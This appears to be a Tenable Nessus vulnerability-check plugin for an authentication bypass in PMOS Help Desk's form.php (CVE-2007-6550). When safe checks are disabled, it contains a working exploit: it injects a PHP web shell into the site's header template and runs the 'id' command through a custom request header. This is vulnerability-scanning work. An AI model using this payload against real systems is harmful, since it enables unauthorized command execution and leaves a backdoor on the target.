#
#  (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(29800);
  script_version("$Revision: 1.2 $");

  script_cve_id("CVE-2007-6550");
  script_bugtraq_id(27032);

  script_name(english:"PMOS Help Desk form.php Authentication Bypass Vulnerability");
  script_summary(english:"Checks for auth bypass issue in PMOS Help Desk"); 
 
 desc = "
Synopsis :

The remote web server contains a PHP script that is prone to an
authentication bypass attack. 

Description :

The remote host is running PMOS Help Desk, an open-source help desk
application written in PHP. 

The version of PMOS Help Desk installed on the remote host contains a
design flaw that can be leveraged by a remote attacker to bypass
authentication and make changes to the application's form template
settings. 

In addition, since the application passes values from several such
settings to PHP 'eval()' functions, successful exploitation of this
issue can lead to arbitrary command execution on the remote host,
subject to the privileges under which the web server operates. 

See also :

http://www.milw0rm.com/exploits/4789

Solution :

Unknown at this time. 

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);
 
  script_category(ACT_MIXED_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/pmos", "/helpdesk", "/support", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Check whether the affected script exists.
  url = string(dir, "/form.php");
  req = http_get(item:url, port:port);
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
  if (res == NULL) exit(0);

  # If ...
  if (
    # we see a form to change options and ...
    "following options will make changes" >< res &&
    # we're redirected
    egrep(pattern:"^Location: +browse.php", string:res)
  )
  {
    # Done if safe checks are enabled.
    if (safe_checks())
    {
      info = string(
        "Note that Nessus has verified the form continues execution after the\n",
        "check for credentials failed, but it has not actually tried to exploit\n",
        "this issue because of the 'Safe checks' setting in effect when this scan\n",
        "was run.\n"
      );
      security_hole(port:port, extra:info);
    }
    # Otherwise try to exploit the issue to run a command.
    #
    # nb: this will change the site's header!!!
    else
    {
      # Try to exploit the flaw to modify the header setting.
      cmd = "id";
      var = string("NESSUS_", toupper(rand_str()));
      exploit = string("<?php error_reporting(0);if($_SERVER[HTTP_", var, "]){passthru(base64_decode($_SERVER[HTTP_", var, "]));die;} ?>");

      postdata = string(
        "header=", urlencode(str:exploit)
      );
      req = string(
        "POST ", url, " HTTP/1.1\r\n",
        "Host: ", get_host_name(), "\r\n",
        "User-Agent: ", get_kb_item("global_settings/http_user_agent"), "\r\n",
        "Content-Type: application/x-www-form-urlencoded\r\n",
        "Content-Length: ", strlen(postdata), "\r\n",
        "\r\n",
        postdata
      );
      res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
      if (res == NULL) exit(0);

      # Now try to exploit the issue to run a command.
      req = http_get(item:string(dir, "/"), port:port);
      req = str_replace(
        string:req,
        find:"User-Agent:",
        replace:string(
          var, ": ", base64(str:cmd), "\r\n",
          "User-Agent:"
        )
      );
      res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
      if (res == NULL) exit(0);

      # Check for a result.
      line = egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res);
      if (line)
      {
        info = string(
          "Nessus was able execute the command '", cmd, "' on the remote host by\n",
          "including the following request header :\n",
          "\n",
          "  ", var, ": ", base64(str:cmd), "\n",
          "\n",
          "It produced the following output :\n",
          "\n",
          "  ", line,
          "\n",
          "Note that you will need to log in as the administrator of the affected\n",
          "application and update the Header Template Option, under 'Manage Ticket\n",
          "Form Template', to prevent further exploitation of this vulnerability.\n"
        );
        security_hole(port:port, extra:info);
      }
    }

    exit(0);
  }
}
